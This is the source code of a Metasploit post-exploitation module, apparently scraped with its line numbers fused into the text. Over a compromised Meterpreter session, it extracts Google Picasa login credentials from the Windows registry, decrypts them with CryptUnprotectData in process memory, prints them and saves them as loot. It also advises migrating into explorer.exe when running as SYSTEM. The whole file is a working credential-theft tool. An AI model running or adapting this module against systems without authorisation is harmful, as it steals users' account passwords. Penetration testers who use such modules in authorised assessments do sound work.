Path: blob/master/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Post::Windows::Priv8include Msf::Auxiliary::Report910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Gather Google Picasa Password Extractor',15'Description' => %q{16This module extracts and decrypts the login passwords17stored by Google Picasa.18},19'License' => MSF_LICENSE,20'Author' => [21'Unknown', # SecurityXploded Team, www.SecurityXploded.com22'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',23],24'Platform' => [ 'win' ],25'SessionTypes' => [ 'meterpreter' ],26'Notes' => {27'Stability' => [CRASH_SAFE],28'SideEffects' => [],29'Reliability' => []30},31'Compat' => {32'Meterpreter' => {33'Commands' => %w[34stdapi_railgun_api35stdapi_sys_config_getuid36stdapi_sys_process_attach37stdapi_sys_process_get_processes38stdapi_sys_process_getpid39stdapi_sys_process_memory_allocate40stdapi_sys_process_memory_read41stdapi_sys_process_memory_write42]43}44}45)46)47end4849def prepare_railgun50if !session.railgun.get_dll('crypt32')51session.railgun.add_dll('crypt32')52end53end5455def decrypt_password(data)56pid = client.sys.process.getpid57process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)5859mem = process.memory.allocate(512)60process.memory.write(mem, data)6162if session.sys.process.each_process.find { |i| i['pid'] == pid }['arch'] == 'x86'63addr = [mem].pack('V')64len = [data.length].pack('V')65ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)66len, addr = ret['pDataOut'].unpack('V2')67else68addr = [mem].pack('Q')69len = [data.length].pack('Q')70ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)71len, addr = ret['pDataOut'].unpack('Q2')72end7374return '' if len == 07576decrypted_pw = process.memory.read(addr, len)77return decrypted_pw78end7980def get_registry81print_status('Looking in registry for stored login passwords by Picasa ...')8283username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaEmail') || ''84password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaPass') || ''8586credentials = Rex::Text::Table.new(87'Header' => 'Picasa Credentials',88'Indent' => 1,89'Columns' =>90[91'User',92'Password'93]94)9596foundcreds = 097if !username.empty? && !password.empty?98passbin = [password].pack('H*')99pass = decrypt_password(passbin)100101if pass && !pass.empty?102print_status('Found Picasa 2 credentials.')103print_good("Username: #{username}\t Password: #{pass}")104105foundcreds = 1106credentials << [username, pass]107end108end109110# For early versions of Picasa3111username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaEmail') || ''112password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaPass') || ''113114if !username.empty? && !password.empty?115passbin = [password].pack('H*')116pass = decrypt_password(passbin)117118if pass && !pass.empty?119print_status('Found Picasa 3 credentials.')120print_good("Username: #{username}\t Password: #{pass}")121122foundcreds = 1123credentials << [username, pass]124end125end126127if foundcreds == 1128path = store_loot(129'picasa.creds',130'text/csv',131session,132credentials.to_csv,133'decrypted_picasa_data.csv',134'Decrypted Picasa Passwords'135)136137print_status("Decrypted passwords saved in: #{path}")138else139print_status('No Picasa credentials found.')140end141rescue StandardError => e142print_error("An error has occurred: #{e}")143end144145def run146uid = session.sys.config.getuid # Decryption only works in context of user's account.147148if is_system?149print_error("This module is running under #{uid}.")150print_error('Automatic decryption will not be possible.')151print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')152else153prepare_railgun154get_registry155end156157print_status('Done')158end159end160161162